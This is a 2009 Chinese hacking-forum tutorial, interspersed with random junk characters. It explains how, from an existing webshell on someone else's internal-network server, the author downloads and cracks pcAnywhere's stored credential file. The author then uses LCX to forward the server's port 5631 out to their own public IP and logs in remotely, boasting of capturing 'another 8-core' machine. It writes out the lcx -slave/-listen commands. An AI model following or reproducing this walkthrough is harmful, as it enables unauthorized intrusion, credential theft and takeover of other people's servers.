|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。8 `, g5 R9 F: d1 q
5 v F5 x4 J! I8 b: J9 j u
提权方法:pcanywhere+LCX
4 I- q* r) J5 E0 D4 b W: q! J4 q; X
- l2 D) u0 ?5 J获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
/ O' b7 g* K2 M V9 c! A2 j8 b9 s1 k% A. i4 D: o4 E
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
8 y5 ~) v% g1 K" E- X% H, Y; v6 \8 V& c( K# q0 H, _
# ~9 G3 p1 M1 R. X* f
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。( m$ u0 L- p8 L5 s
# [" ~" R* G. L7 z! K% g
4 o) N X) ~3 c2 v
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
0 G0 ~6 v/ t. u A- L
% F* n! u5 k9 K5 l2 ^0 A I) }( ]8 m* r K! |- ?
! B6 a6 q& z$ a9 `' q
: D7 `$ S9 J- S. |( _1 \- h4 q/ F由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``! f# B0 `5 g3 x( m& o
F7 N% w3 r6 `( T! t B" ^. X; _4 F/ @
LCX的用法再简单说下:' Z W* l4 J( h7 G, T7 \4 W- B9 h
$ Q0 H6 [/ Y- N) N3 u( [ s. s6 X服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
0 \7 s7 a4 U, U! A; ~8 U5 e% l7 ^ D% o) I
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)0 \; b! T w+ E" @( B$ ]
/ y; i- F2 A- q' M! c8 l: r由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。, h2 i: o9 Y% u9 u
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``! i3 R8 Q- F: X/ Y
. ]; d9 G' D* @. E/ g
; }5 \ o( T" y/ p, |! D) i% I6 ^) P7 w: Q% P
# A2 v, I1 l4 p0 e, n
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。3 n1 y: s: L/ Y2 e, w
1 y0 B) u/ @! Z* ?( H4 l+ P; X6 B% k" Q5 k. g1 M
% F! x6 |( x! n5 r' W
1 J( \/ F: R7 O我们本地连接试试,输入我们刚破解的账号密码
5 C6 \* g! `: ^7 x1 X$ k9 L8 @- C0 U7 ~/ ]$ f& h7 O
+ U( P" i5 G3 c$ ?. H! u
呵呵``连接成功,服务器不错,又一个8核^︵^' r- A7 S: c( L$ b6 [9 A
9 `7 r* S3 f7 F. z2 G0 F! X( S( s% s
: E7 r2 Y0 Q/ g3 [% R
5 ]* t% H1 L' {% s4 ? |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
